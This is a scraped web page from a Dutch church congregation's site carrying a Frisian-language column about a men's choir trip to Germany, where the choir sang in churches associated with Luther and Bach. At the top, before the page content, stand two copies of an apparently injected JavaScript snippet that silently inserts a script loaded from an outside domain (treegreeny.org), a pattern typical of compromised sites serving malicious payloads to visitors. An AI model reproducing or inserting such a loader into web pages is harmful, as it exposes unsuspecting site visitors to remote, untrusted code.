;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Reis - PKN Damwâld

Reis

Gepubliceerd op: vrijdag 17 januari 2020

In pear jier ferlyn hawwe wy in reis fan in oantal dagen makke nei Dútslân. Wy songen mei yn in mânlju ’s koar en wy mochten op in 7 plakken yn Dútslân sjonge. Op sa ’n reis, dy ’t yn it teken stie fan Luther en Bach, binne jo ûnder de yndruk fan meardere dingen. De dingen dy ’t jo sjogge, lykas it prachtige lânskip (wy wiene yn de buert fan Leipzig) mar de ek prachtige kastielen en tsjerken. Wy hiene it foardiel dat it prachtig, om net te sizzen, hyt waar wie (mear as 35 graden) en dan kinne jo hiel lang bûten wêze. Yn meardere basilieken hawwe wy songen. Yn die grutte tsjerken is it dan koel en it sjongen dêr is in grut foarrjocht. Jo ervare yn sekere sin de oanwêzicheid fan Luther en Bach. It waarme waar hie ta ’n gefolgen dat de toeristen dy ’t yn de plakken wiene wol wat skaad hawwe woene en as hja hearden dat wy yn in grutte tsjerke songen kaam men spontaan út de waarmte wei yn de behaachlike basiliken. As jo yn sa ’n tsjerke binne falle jo in pear dingen op: It sjongt yn sa ’n tsjerke (noch) moaier as yn in trochsné tsjerke. Jo fiele de tiid fan alear yn sekere sin troch jo hinne gean. En de akoestiek is fan in heech nivo. Mar ek de oanklaaiing fan sa ’n tsjerke hat wat oerweldigjens oer him en tink je soms wolris: ‘moast it no sa mâl?’ sa oerdidich, mar dochs is it ek wer nijsgjirrich om te sjen hoe ’t de minsken har yn ierdere tiden ynspanden om foar it leauwen wat moais del te setten. Of ’t de motieven altiten like rjocht wiene kin men betwifelje mar dat de ynterieurs fan dizze tsjerken yndruk op je meitsje is wis. It lûkt minsken, dus as je posityf tinke wolle kinne je dochs sizze dat in soad minsken noch altiten yn kontakt komme mei de tsjerke.

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns